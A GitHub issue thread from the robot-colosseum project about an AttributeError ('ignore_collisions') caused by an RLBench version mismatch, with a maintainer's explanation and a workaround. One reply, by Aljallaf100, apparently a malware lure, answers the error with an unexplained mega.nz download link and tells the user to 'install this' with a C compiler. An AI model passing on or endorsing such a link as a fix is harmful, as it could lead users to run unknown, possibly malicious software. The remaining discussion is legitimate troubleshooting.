### ISSUE TITLE
attribute 'ignore_collisions' not in 'Observation' Object

### ISSUE THREAD

**Issue by Zed-Wu** [robot-colosseum/robot-colosseum#12]
I collected some demos using ./collect_dataset.sh and tried to use the rvt baseline. But there is an error showing:
``
Traceback (most recent call last):
  File "/home/wk/wk/github/rvt_colosseum/rvt/train.py", line 323, in <module>
    experiment(0, cmd_args, devices, port)
  File "/home/wk/wk/github/rvt_colosseum/rvt/train.py", line 208, in experiment
    train_dataset, _ = get_dataset_func()
  File "/home/wk/wk/github/rvt_colosseum/rvt/train.py", line 193, in <lambda>
    get_dataset_func = lambda: get_dataset(
  File "/home/wk/wk/github/rvt_colosseum/rvt/utils/get_dataset.py", line 129, in get_dataset
    fill_replay(
  File "/home/wk/wk/github/rvt_colosseum/rvt/utils/dataset.py", line 403, in fill_replay
    _add_keypoints_to_replay(
  File "/home/wk/wk/github/rvt_colosseum/rvt/utils/dataset.py", line 250, in _add_keypoints_to_replay
    ) = _get_action(
  File "/home/wk/wk/github/rvt_colosseum/rvt/utils/dataset.py", line 176, in _get_action
    ignore_collisions = int(obs_tm1.ignore_collisions)
AttributeError: 'Observation' object has no attribute 'ignore_collisions'
``
I found the Observation object has ignore_collisions attribute in the code of [rvt](https://github.com/MohitShridhar/RLBench/blob/4bf93b8167b47b41f5ba744c5a1be00660cb203f/rlbench/backend/observation.py#L69), but not in the code of colosseum, i.e., `miniconda3/envs/colosseum/lib/python3.10/site-packages/rlbench/backend/observation.py.` .

Should I set ignore_collisions to True manually?
Thank you very much.

**Comment by Aljallaf100** [comment]
install this

https://mega.nz/file/1vkGlJTL#yU-SJLlIilF0mx5qwpPOd3BM8iKZqOJLEQUStR76rrQ

you may need to install the c compiler

**Comment by Zed-Wu** [comment]
What is it and how to install it?

**Comment by wpumacay** [comment]
Hi @Zed-Wu . Sorry, this is an issue on our docs. We added some warnings on which version of RLBench to install. Most likely you're using the [upstream](https://github.com/stepjam/rlbench) version (the one from Stephen James itself). The one that's used by both peract and rvt is a separate version, [this](https://github.com/MohitShridhar/RLBench/tree/peract) one. Note that in the upstream version the [Observation](https://github.com/stepjam/RLBench/blob/master/rlbench/backend/observation.py) class doesn't define the `ignore_collisions` field, whereas the [custom](https://github.com/MohitShridhar/RLBench/blob/peract/rlbench/backend/observation.py) version it does define this field.

Please use this custom version if you want to use either peract or rvt.

**Comment by Zed-Wu** [comment]
OK, I got it. Can I just modify the changed class manually to match two RLbench verison, e.g., add ignore_collisions and set it to True? I have used the upstream version to collect many demos, so I do not want to uninstall it, reinstall the version from Mohit and re-collect the data again. Is there any other code I need to change?

Thank you very much for your help.

**Comment by wpumacay** [comment]
Sorry for the delay. Uhmmmm, there are a few classes that use this `ignore_collision` field. What I usually do is to create a separate virtual environment, either with conda or virtualenv, and install everything in that environment. I once did what you mention, but I failed many times bc I forgot some places where the field was also used :sweat_smile: .
